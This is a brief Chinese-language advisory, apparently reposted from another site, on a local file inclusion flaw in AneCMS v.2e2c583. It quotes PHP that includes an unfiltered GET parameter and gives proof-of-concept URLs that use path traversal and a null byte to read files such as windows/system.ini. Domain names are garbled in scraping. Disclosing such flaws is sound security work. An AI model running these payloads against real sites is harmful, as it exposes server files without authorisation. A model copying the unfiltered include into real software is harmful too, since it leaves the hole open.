标题: AneCMS v.2e2c583 LFI exploit 作者Author: I2sec-PJH 软件开发网站: https://github测试数据/AneGroup/AneCMS 影响版本: v.2e2c583 概述 source of index.php页面存在缺陷 代码分析如下 1. if(isset($_GET['p'])) 2. include './pages/'.$_GET['p'].'.php'; 3. else 4. include './pages/dash.php'; 测试证明 http://HdhCmsTest2cto测试数据 /acp/index.php?p= windows /system.ini%00 http://HdhCmsTest2cto测试数据 /acp/index.php?p=[localfile]%00 HdhCmsTest2cto测试数据提供修复: 过滤
查看更多关于AneCMS v.2e2c583本地文件包含缺陷及修复 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12358